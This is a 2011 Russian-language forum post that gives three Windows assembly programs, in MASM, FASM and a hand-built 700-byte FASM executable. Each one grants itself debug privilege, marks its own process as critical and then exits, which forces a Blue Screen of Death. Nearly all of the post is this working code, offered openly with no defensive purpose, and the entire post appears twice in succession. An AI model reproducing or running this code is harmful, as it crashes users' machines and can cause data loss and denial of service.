VindictuS
05.07.2011, 13:37
Этот код демонстрирует Синий Экран Смерти.
Версия для MASM весит в 1,0 КБ stub. FASM версии в 1,50 кб. третий пример составляет 700 байт, когда EXE заголовок составляется вручную.
Выполняет в режиме администратора только.
MASM (1.00 KB):
.386
.model flat, stdcall
option casemap :none
include masm32includekernel32.inc
include masm32includentdll.inc
includelib masm32libkernel32.lib
includelib masm32libntdll.lib
.code
LibName db "ntdll", 0
ProcName db "RtlSetProcessIsCritical", 0
start:
lea eax, [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
push 0
push 0
push 1
invoke LoadLibrary, addr LibName
invoke GetProcAddress, eax, addr ProcName
call eax
call ExitProcess
end start
FASM (1.50 KB):
format PE GUI 4.0
include '..\!FASM\INCLUDE\win32a.inc'
lea eax, dword [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
invoke RtlSetProcessIsCritical, 1, 0, 0
invoke ExitProcess
section '.data' import data readable writeable
library ntdll, 'ntdll', kernel32, 'kernel32'
import ntdll, RtlAdjustPrivilege, 'RtlAdjustPrivilege', RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
import kernel32, ExitProcess, 'ExitProcess'
FASM, tiny version, 700 bytes:
format binary as "EXE"
use32
db "MZ"
dw $60, 1
db 0, 0, 2, 0
dw $1000, $1000, 0, 4160
db 0, 0, 0, 0, 0, 0
dw $1C
db 0, 0, 0, 0, 0, 0, $0E, $1F, $B4, 9, $BA, $20, 0, $CD, $21, $B8, 1, $4C, $CD, $21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, $60, 0, 0, 0
db ".............................", $0D, $0A, $24, "PE", 0, 0
dw $014C, 1
dd 0, 0, 0
dw $00E0, $010E, $010B, 0
dd 0, 0, 0, (start), 0, 0, 0, $1000, $0200, 1, 0, 4, 0, ((llveryend+$0FFF) shr 12) shl 12, $0200, 0
dw 2, 0
dd $1000, $1000, $1000, 0, 0, 16
dq 0
dd (llimpbeg), xximpsize
dq 3 dup(0)
dd (llrelbeg), 8
dq 10 dup(0)
db ".datasec"
dd (llveryend-start), $1000, (llveryend-start), $0200, 0, 0, 0, $60000020
db ($0200-$) dup(0)
org $1000
start: cld
call refe
refe: pop esi
lea ebx, [esi+(imp_center-refe)]
lea eax, dword [esp+12]
push eax 0 1 20
call dword [(RtlAdjustPrivilege-imp_center)+ebx]
push 0 0 1
call dword [(RtlSetProcessIsCritical-imp_center)+ebx]
call dword [(ExitProcess-imp_center)+ebx]
llimpbeg:
dd 0, 0, 0, (kernel_name), (kernel_table)
dd 0, 0, 0, (ntdll_name), (ntdll_table)
dd 0, 0, 0
llrelbeg:
dd 0, 8
kernel_table:
ExitProcess: dd (_ExitProcess), 0
imp_center:
ntdll_table:
RtlAdjustPrivilege: dd (_RtlAdjustPrivilege)
RtlSetProcessIsCritical: dd (_RtlSetProcessIsCritical), 0
kernel_name: db "kernel32", 0
ntdll_name: db "ntdll", 0
_ExitProcess: db 0, 0, "ExitProcess"
_RtlAdjustPrivilege: db 0, 0, "RtlAdjustPrivilege"
_RtlSetProcessIsCritical: db 0, 0, "RtlSetProcessIsCritical"
xximpsize = ($ - llimpbeg)
llveryend:
Версия для MASM весит в 1,0 КБ stub. FASM версии в 1,50 кб. третий пример составляет 700 байт, когда EXE заголовок составляется вручную.
Выполняет в режиме администратора только.
MASM (1.00 KB):
.386
.model flat, stdcall
option casemap :none
include masm32includekernel32.inc
include masm32includentdll.inc
includelib masm32libkernel32.lib
includelib masm32libntdll.lib
.code
LibName db "ntdll", 0
ProcName db "RtlSetProcessIsCritical", 0
start:
lea eax, [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
push 0
push 0
push 1
invoke LoadLibrary, addr LibName
invoke GetProcAddress, eax, addr ProcName
call eax
call ExitProcess
end start
FASM (1.50 KB):
format PE GUI 4.0
include '..\!FASM\INCLUDE\win32a.inc'
lea eax, dword [esp+12]
invoke RtlAdjustPrivilege, 20, 1, 0, eax
invoke RtlSetProcessIsCritical, 1, 0, 0
invoke ExitProcess
section '.data' import data readable writeable
library ntdll, 'ntdll', kernel32, 'kernel32'
import ntdll, RtlAdjustPrivilege, 'RtlAdjustPrivilege', RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
import kernel32, ExitProcess, 'ExitProcess'
FASM, tiny version, 700 bytes:
format binary as "EXE"
use32
db "MZ"
dw $60, 1
db 0, 0, 2, 0
dw $1000, $1000, 0, 4160
db 0, 0, 0, 0, 0, 0
dw $1C
db 0, 0, 0, 0, 0, 0, $0E, $1F, $B4, 9, $BA, $20, 0, $CD, $21, $B8, 1, $4C, $CD, $21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, $60, 0, 0, 0
db ".............................", $0D, $0A, $24, "PE", 0, 0
dw $014C, 1
dd 0, 0, 0
dw $00E0, $010E, $010B, 0
dd 0, 0, 0, (start), 0, 0, 0, $1000, $0200, 1, 0, 4, 0, ((llveryend+$0FFF) shr 12) shl 12, $0200, 0
dw 2, 0
dd $1000, $1000, $1000, 0, 0, 16
dq 0
dd (llimpbeg), xximpsize
dq 3 dup(0)
dd (llrelbeg), 8
dq 10 dup(0)
db ".datasec"
dd (llveryend-start), $1000, (llveryend-start), $0200, 0, 0, 0, $60000020
db ($0200-$) dup(0)
org $1000
start: cld
call refe
refe: pop esi
lea ebx, [esi+(imp_center-refe)]
lea eax, dword [esp+12]
push eax 0 1 20
call dword [(RtlAdjustPrivilege-imp_center)+ebx]
push 0 0 1
call dword [(RtlSetProcessIsCritical-imp_center)+ebx]
call dword [(ExitProcess-imp_center)+ebx]
llimpbeg:
dd 0, 0, 0, (kernel_name), (kernel_table)
dd 0, 0, 0, (ntdll_name), (ntdll_table)
dd 0, 0, 0
llrelbeg:
dd 0, 8
kernel_table:
ExitProcess: dd (_ExitProcess), 0
imp_center:
ntdll_table:
RtlAdjustPrivilege: dd (_RtlAdjustPrivilege)
RtlSetProcessIsCritical: dd (_RtlSetProcessIsCritical), 0
kernel_name: db "kernel32", 0
ntdll_name: db "ntdll", 0
_ExitProcess: db 0, 0, "ExitProcess"
_RtlAdjustPrivilege: db 0, 0, "RtlAdjustPrivilege"
_RtlSetProcessIsCritical: db 0, 0, "RtlSetProcessIsCritical"
xximpsize = ($ - llimpbeg)
llveryend: